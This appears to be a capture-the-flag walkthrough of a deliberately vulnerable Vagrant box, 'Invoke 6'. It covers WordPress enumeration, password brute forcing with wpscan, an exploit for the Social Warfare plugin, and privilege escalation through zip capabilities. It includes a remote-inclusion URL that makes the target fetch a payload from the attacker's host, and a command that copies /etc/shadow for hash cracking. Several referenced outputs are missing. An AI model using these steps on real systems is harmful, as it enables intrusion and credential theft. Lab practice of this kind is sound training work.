OGC: Invoke 6

Today we will be looking at Invok6 on Vagrant, found here https://app.vagrantup.com/overgrowncarrot1/boxes/Invoke6

Starting off with a RustScan we see the following ports:

Running a directory buster we can see wordpress:

Lets enumerate users and plugins and see what we find:

wpscan --url http://192.168.0.44/wordpress -e u 

wpscan --url http://192.168.0.44/wordpress -U george -P /usr/share/wordlists/fasttrack.txt

When running the above we see something weird, a plugin that was not detected before:

searchsploit social warfare 

searchsploit -m php/webapps/46794.py

Now run the following:

http://<RHOST IP>/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://<LHOST IP AND PORT>/payload.txt

getcap -r / 2>/dev/null

We can see zip in capabilites, this is a problem

zip /tmp/shadow.zip /etc/shadow

Grabbing that hash we can bring it back to ourselves and login as root after cracking it:

Hopefully you learned something with this box. There are quite a few rabbit holes in it, so becareful where you step…